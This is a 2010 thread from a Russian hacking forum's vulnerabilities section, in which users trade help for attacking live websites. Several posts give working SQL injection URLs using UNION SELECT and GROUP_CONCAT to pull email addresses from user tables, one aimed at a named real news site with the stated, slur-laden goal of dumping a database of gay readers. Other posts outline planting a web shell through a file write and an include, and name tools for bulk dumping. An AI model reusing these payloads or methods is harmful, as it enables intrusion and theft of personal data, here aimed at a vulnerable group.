HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15511  
Старый 03.11.2010, 23:55
roddik
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами: 9116636

Репутация: 39
По умолчанию

Привет, такая ситуация, есть инъекция в селекте, есть file_priv, кавычки не экранируются, есть фулл пасс к сайту. Но проблема в том, что, как я понял, прав на запись во что-то, видное из инета, не хватает - я могу записать в /tmp, но куда-то на сайт - нет. На сайте нету форм аплоада, в админке тоже нету, видимо картинки грузятся по фтп. Соседние сайты такие же ущербные, по крайней мере, на первый взгляд. Если я правильно понимаю, единственный вариант залить шелл в подобных условиях - найти писабельную папку? Ось freebsd, но при load_file папки я вижу несколько левых символов, но не вижу листинг файлов (почему такое может быть?). Какие есть тулзы для поиска форм аплоада? Спасибо
 
Ответить с цитированием

  #15512  
Старый 04.11.2010, 00:09
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

1. залей в /tmp

2. ищи инклуд

3. подцепи шеллик
 
Ответить с цитированием

  #15513  
Старый 04.11.2010, 23:01
ALIM
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами: 8452680

Репутация: 0
По умолчанию

Цитата:
Сообщение от Gorev  
попробуй unhex(hex()) , aes_encrypt
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--

Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
 
Ответить с цитированием

  #15514  
Старый 04.11.2010, 23:06
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от ALIM  
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?
вручную через лимит по одной записи, все через утилиту...
 
Ответить с цитированием

  #15515  
Старый 04.11.2010, 23:07
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(CONCAT(e-mail),0x71),0x71),4+from+user+limit+0,1--

лимитом перебирай
 
Ответить с цитированием

  #15516  
Старый 04.11.2010, 23:31
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от ALIM  
http://www.baywindows.com/index.php?ch=news&sc=glbt&sc3=&id=106949%20and%201 =2%20union%20select%20aes_decrypt(aes_encrypt(GROU P_CONCAT(email),0x71),0x71),2,3,4,5,6,7,8,9,10%20f rom%20users --
хотел слить базу гомиков, если кто-нибудь обьяснит в личку каким образом можно было слить всю базу, а не по одному скажу спасибо
что тут обьяснять? я же тебе выше написал, используй тулзу какую нибудь, например сипт или панголин...делов то...
 
Ответить с цитированием

  #15517  
Старый 04.11.2010, 23:36
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Вопрос: Могу исполнять html, как залить шшел?
 
Ответить с цитированием

  #15518  
Старый 05.11.2010, 00:01
Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами: 10139306

Репутация: 1089


По умолчанию

Цитата:
Сообщение от EoGeneo  
Вопрос: Могу исполнять html, как залить шшел?
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
 
Ответить с цитированием

  #15519  
Старый 05.11.2010, 00:05
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
С нами: 8789993

Репутация: 5
По умолчанию

Цитата:
Сообщение от Kusto  
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
 
Ответить с цитированием

  #15520  
Старый 05.11.2010, 00:09
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами: 8772211

Репутация: 56
По умолчанию

Цитата:
Сообщение от EoGeneo  
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли
А то, что HTML - это язык гипертекстовой разметки, тебе не пришло в голову?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.